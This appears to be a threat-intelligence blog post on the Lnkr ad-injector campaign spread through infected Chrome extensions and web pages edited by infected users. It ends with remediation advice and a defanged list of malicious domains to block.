Previously Netskope Threat Labs published a blog post about a Lnkr ad injector campaign launched using Google Chrome extensions. As Figure 1 illustrates, the number of Lnkr infections spiked dramatically in November 2019 and again in the spring of 2020, when Brian Krebs uncovered information about the source of the infected Chrome extensions. Today, we’re revisiting the Lnkr adware because:
- We have observed a rise in the number of Lnkr infections starting in May and continuing through June, indicating that newly infected Chrome extensions are appearing again.
- We have identified new web pages that were infected with Lnkr and identified the root cause to be a form of fanout, where an infected user infects a webpage when they edit it.
- We have identified 155 new domains hosting Lnkr that are associated with these new extensions and infected websites.
Infected users
The latest rise of infected users began in early May and continued through the month of June. As was the case in the previous two spikes, only Google Chrome users were affected. The infected extensions inject trackers and ads into the user’s web traffic, including online banking portals and intranet sites, giving the attackers detailed visibility into an infected user’s browsing habits.
The infection occurs when a user installs an infected extension. This might happen when:
- The user installs a new extension that is infected.
- The user updates to the latest version of an already installed extension that is newly infected.
We also have evidence from external sources supporting that Lnkr infections are widespread. ESET’s Q1 Report lists hardyload[.]com as one of the top 10 malicious blocked domains. This Lnkr domain ranks second in our list, behind only brounelink[.]com. An excerpt of this report is shown in Figure 2.
We also found brounelink[.]com to be the primary domain used in a widespread infection affecting school students. A Google Chrome support post stated, “Students were unable to access shared documents, watch embedded videos, save work in Google drive, and use Google Hangouts. Once allow listed, www.brounelink[.]com in Trend, all the problems went away.” An excerpt of the article is shown in Figure 3.
Infected web pages
Netskope Threat Labs have identified more than 1,500 web pages that were infected with Lnkr. There are several ways a website might become infected with Lnkr. For example, the owner of the website might deliberately include the code for monetization, or a developer might accidentally infect the website if they themselves are infected. We found multiple examples of websites that were accidentally infected. In one example, a Marketo webpage was accidentally infected when an infected user edited the webpage and the infected Chrome Extension injected the Lnkr code into the HTML they were editing. They saved their changes, which included the Lnkr code, and published it to the website.
These accidental infections follow a similar pattern to our October 2019 post showing how GitHub Pages sites became infected with Ramnit. In the Ramnit case, the culprit was a file infector that infected the files in a GitHub repository. In the Lnkr case, an infected Chrome extension injected the Lnkr script into web pages that were being edited in the browser.
This ad’s for us
Netskope Threat Labs analyzed more than 1000 Lnkr ad injector scripts, including the scripts hosted on the 155 new domains we identified, and found that they all referenced the same domain: thisadsfor[.]us, as shown in Figure 4.
As described in Brian Krebs’s article, the domain thisadsfor[.]us is registered to Frank Medison (Email – frankomedison1020@gmail[.]com), who has also been tied to similar websites related to dodgy toolbars, add ons, and extensions. The references to thisadsfor[.]us in all of the new domains we identified indicates that this is either the work of the same actor or a new actor that has borrowed from the earlier work without making any significant changes.
Conclusion
The development of the Lnkr campaign is active and still ongoing. Netskope Threat Labs recommends you:
- Audit the extensions installed in your Chrome browser at chrome://extensions and remove any affected extensions
- Search your website for the domains listed at the end of the post and remove any scripts or links that reference them.
- Block the domains listed at the end of this post.
Indicators of compromise
Updated set of Lnkr Urls( Including the 155 new domains)
thisadsfor[.]us
plusdroop[.]net
coolpagecup[.]com
cooljorrd[.]com
platewolf[.]com
nightroi[.]com
bugdepromo[.]com
tracksmall[.]com
jaramyouk[.]org
marryjoy[.]net
ideafrank[.]com
rayanplug[.]xyz
signagetop[.]org
transmapp[.]com
magictraps[.]com
protrois[.]com
craftprimes[.]com
cilkonlay[.]com
pagescr[.]cool
jobsaddy[.]xyz
mikkymax[.]com
donewrork[.]org
cozytech[.]biz
minisrclink[.]cool
clipsold[.]com
criticalltech[.]com
vildlonger[.]com
dashvintage[.]biz
toolsmagick[.]com
linkpowerapp[.]com
extnetcool[.]com
darkflags[.]net
crisgrey[.]com
peterjonny[.]com
mobiclean[.]xyz
linkojager[.]org
higedev[.]cool
cloffext[.]com
flexylincks[.]com
miniklixk[.]org
protesidenext[.]com
outsource[.]cool
golinkapp[.]com
remaideout[.]com
oilcloze[.]com
roxlock[.]com
dimagesrc[.]com
brounelink[.]com
autroliner[.]com
klarittyjoy[.]com
cdn-mxpnl[.]com
www[.]billyjons[.]net